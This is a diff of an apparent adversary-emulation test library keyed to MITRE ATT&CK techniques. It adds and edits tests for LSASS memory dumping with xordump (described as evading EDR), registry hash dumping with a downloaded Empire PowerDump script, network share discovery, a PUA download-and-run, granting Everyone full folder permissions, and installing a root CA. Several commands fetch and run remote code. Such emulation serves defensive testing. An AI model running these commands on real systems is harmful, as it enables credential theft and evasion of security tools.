del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
+
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
@@ -158,6 +159,7 @@ atomic_tests:
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
+
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
@@ -354,3 +356,37 @@ atomic_tests:
del #{output_file}
name: powershell
elevation_required: true
+
+- name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+ importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+ file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+ Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: |
+ Computer must have xordump.exe
+ prereq_command: |
+ if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+ executor:
+ command: |
+ #{xordump_exe} -out #{output_file} -x 0x41
+ cleanup_command: |
+ Remove-Item ${output_file} -ErrorAction Ignore
+ name: powershell
+ elevation_required: true
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index d2b817bc..1516c1da 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry.
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-Import-Module .\PowerDump.ps1
+Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
```
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 081107a1..958fac22 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -94,7 +94,7 @@ atomic_tests:
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 2170b0ed..709cdd61 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -8,13 +8,15 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
- [Atomic Test #1 - Network Share Discovery](#atomic-test-1---network-share-discovery)
-- [Atomic Test #2 - Network Share Discovery command prompt](#atomic-test-2---network-share-discovery-command-prompt)
+- [Atomic Test #2 - Network Share Discovery - linux](#atomic-test-2---network-share-discovery---linux)
-- [Atomic Test #3 - Network Share Discovery PowerShell](#atomic-test-3---network-share-discovery-powershell)
+- [Atomic Test #3 - Network Share Discovery command prompt](#atomic-test-3---network-share-discovery-command-prompt)
-- [Atomic Test #4 - View available share drives](#atomic-test-4---view-available-share-drives)
+- [Atomic Test #4 - Network Share Discovery PowerShell](#atomic-test-4---network-share-discovery-powershell)
-- [Atomic Test #5 - Share Discovery with PowerView](#atomic-test-5---share-discovery-with-powerview)
+- [Atomic Test #5 - View available share drives](#atomic-test-5---view-available-share-drives)
+
+- [Atomic Test #6 - Share Discovery with PowerView](#atomic-test-6---share-discovery-with-powerview)
@@ -22,7 +24,7 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
## Atomic Test #1 - Network Share Discovery
Network Share Discovery
-**Supported Platforms:** macOS, Linux
+**Supported Platforms:** macOS
@@ -50,7 +52,49 @@ showmount #{computer_name}
-## Atomic Test #2 - Network Share Discovery command prompt
+## Atomic Test #2 - Network Share Discovery - linux
+Network Share Discovery using smbstatus
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba|
+| package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba|
+
+
+#### Attack Commands: Run with `bash`!
+
+
+```bash
+smbstatus --shares
+```
+
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: Package with smbstatus (samba) must exist on device
+##### Check Prereq Commands:
+```bash
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
+```
+##### Get Prereq Commands:
+```bash
+sudo #{package_installer}
+```
+
+
+
+
+
+
+
+## Atomic Test #3 - Network Share Discovery command prompt
Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
Upon execution avalaible network shares will be displayed in the powershell session
@@ -80,7 +124,7 @@ net view \\#{computer_name}
-## Atomic Test #3 - Network Share Discovery PowerShell
+## Atomic Test #4 - Network Share Discovery PowerShell
Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
Upon execution, avalaible network shares will be displayed in the powershell session
@@ -105,7 +149,7 @@ get-smbshare
-## Atomic Test #4 - View available share drives
+## Atomic Test #5 - View available share drives
View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session
**Supported Platforms:** Windows
@@ -129,7 +173,7 @@ net share
-## Atomic Test #5 - Share Discovery with PowerView
+## Atomic Test #6 - Share Discovery with PowerView
Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.
**Supported Platforms:** Windows
diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml
index 8434f3ce..d7558832 100644
--- a/atomics/T1135/T1135.yaml
+++ b/atomics/T1135/T1135.yaml
@@ -7,7 +7,6 @@ atomic_tests:
Network Share Discovery
supported_platforms:
- macos
- - linux
input_arguments:
computer_name:
description: Computer name to find a mount on.
@@ -19,6 +18,34 @@ atomic_tests:
smbutil view -g //#{computer_name}
showmount #{computer_name}
name: sh
+- name: Network Share Discovery - linux
+ auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
+ description: |
+ Network Share Discovery using smbstatus
+ supported_platforms:
+ - linux
+ input_arguments:
+ package_checker:
+ description: Package checking command. Debian - dpkg -s samba
+ type: string
+ default: rpm -q samba
+ package_installer:
+ description: Package installer command. Debian - apt install samba
+ type: string
+ default: yum install -y samba
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Package with smbstatus (samba) must exist on device
+ prereq_command: |
+ if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
+ get_prereq_command: |
+ sudo #{package_installer}
+ executor:
+ command: |
+ smbstatus --shares
+ name: bash
+ elevation_require: true
- name: Network Share Discovery command prompt
auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
description: |
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index 340a7a23..eda78a1e 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -22,6 +22,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #7 - Headless Chrome code execution via VBA](#atomic-test-7---headless-chrome-code-execution-via-vba)
+- [Atomic Test #8 - Potentially Unwanted Applications (PUA)](#atomic-test-8---potentially-unwanted-applications-pua)
+
@@ -424,4 +426,39 @@ Write-Host "You will need to install Google Chrome manually to meet this require
+
+
+
+## Atomic Test #8 - Potentially Unwanted Applications (PUA)
+The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe|
+| pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
+& "#{pua_file}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{pua_file}
+```
+
+
+
+
+
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 4f2bad32..971dda55 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -288,3 +288,31 @@ atomic_tests:
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
name: powershell
+
+- name: Potentially Unwanted Applications (PUA)
+ auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
+ description: |
+ The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ pua_url:
+ description: url to PotentiallyUnwanted.exe
+ type: url
+ default: "http://amtso.eicar.org/PotentiallyUnwanted.exe"
+ pua_file:
+ description: path to PotentiallyUnwanted.exe
+ type: Path
+ default: "$env:TEMP/PotentiallyUnwanted.exe"
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
+ & "#{pua_file}"
+ cleanup_command: |
+ Remove-Item #{pua_file}
+
diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md
index 576c3ad0..def6c2c7 100644
--- a/atomics/T1222.001/T1222.001.md
+++ b/atomics/T1222.001/T1222.001.md
@@ -224,6 +224,7 @@ You can set your own path variable to "C:\*" if you prefer.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | Path of folder to recursively set permissions on | path | C:\Users\Public\*|
+| file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -233,9 +234,25 @@ You can set your own path variable to "C:\*" if you prefer.
icacls "#{path}" /grant Everyone:F /T /C /Q
```
+#### Cleanup Commands:
+```cmd
+icacls '#{path}' /restore #{file_path} /q >nul 2>&1
+```
+#### Dependencies: Run with `command_prompt`!
+##### Description: Backup of original folder permissions should exist (for use in cleanup commands)
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+icacls #{path} /save #{file_path} /t /q >nul 2>&1
+```
+
+
diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml
index 4f03b7de..1d80a6f2 100644
--- a/atomics/T1222.001/T1222.001.yaml
+++ b/atomics/T1222.001/T1222.001.yaml
@@ -132,7 +132,21 @@ atomic_tests:
description: Path of folder to recursively set permissions on
type: path
default: 'C:\Users\Public\*'
+ file_path:
+ description: Path of folder permission back
+ type: Path
+ default: '%temp%\T1222.001-folder-perms-backup.txt'
+ dependency_executor_name: command_prompt
+ dependencies:
+ - description: |
+ Backup of original folder permissions should exist (for use in cleanup commands)
+ prereq_command: |
+ IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+ get_prereq_command: |
+ icacls #{path} /save #{file_path} /t /q >nul 2>&1
executor:
command: icacls "#{path}" /grant Everyone:F /T /C /Q
+ cleanup_command: |
+ icacls '#{path}' /restore #{file_path} /q >nul 2>&1
name: command_prompt
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 5b210391..7925bb5f 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -75,10 +75,10 @@ Adversaries may attempt to get a listing of non-security related software that i
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `sh`!
-```cmd
+```sh
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
```
diff --git a/atomics/T1518/T1518.yaml b/atomics/T1518/T1518.yaml
index e42eefd3..c6a329a9 100644
--- a/atomics/T1518/T1518.yaml
+++ b/atomics/T1518/T1518.yaml
@@ -33,7 +33,7 @@ atomic_tests:
supported_platforms:
- macos
executor:
- name: command_prompt
+ name: sh
elevation_required: false
command: |
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md
index 43e59df9..c17ef4a6 100644
--- a/atomics/T1553.004/T1553.004.md
+++ b/atomics/T1553.004/T1553.004.md
@@ -90,14 +90,14 @@ echo sudo update-ca-certificates
-#### Dependencies: Run with `command_prompt`!
+#### Dependencies: Run with `sh`!
##### Description: Verify the certificate exists. It generates if not on disk.
##### Check Prereq Commands:
-```cmd
+```sh
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
-```cmd
+```sh
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
```
@@ -123,24 +123,24 @@ Creates a root CA with openssl
| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
-```cmd
+```sh
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
```
-#### Dependencies: Run with `command_prompt`!
+#### Dependencies: Run with `sh`!
##### Description: Verify the certificate exists. It generates if not on disk.
##### Check Prereq Commands:
-```cmd
+```sh
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
-```cmd
+```sh
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
```
diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml
index d3663bc7..668dc4fe 100644
--- a/atomics/T1553.004/T1553.004.yaml
+++ b/atomics/T1553.004/T1553.004.yaml
@@ -44,7 +44,7 @@ atomic_tests:
description: Key we create that is used to create the CA certificate
type: Path
default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
dependencies:
- description: |
Verify the certificate exists. It generates if not on disk.
@@ -74,7 +74,7 @@ atomic_tests:
description: Key we create that is used to create the CA certificate
type: Path
default: rootCA.key
- dependency_executor_name: command_prompt
+ dependency_executor_name: sh
dependencies:
- description: |
Verify the certificate exists. It generates if not on disk.
@@ -86,7 +86,7 @@ atomic_tests:
executor:
command: |
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
- name: command_prompt
+ name: sh
elevation_required: true
- name: Install root CA on Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index eba1dedd..e739deb5 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -692,3 +692,6 @@ c75612b2-9de0-4d7c-879c-10d7b077072d
e86f1b4b-fcc1-4a2a-ae10-b49da01458db
10447c83-fc38-462a-a936-5102363b1c43
fcbdd43f-f4ad-42d5-98f3-0218097e2720
+86fc3f40-237f-4701-b155-81c01c48d697
+875805bc-9e86-4e87-be86-3a5527315cae
+02f35d62-9fdc-4a97-b899-a5d9a876d295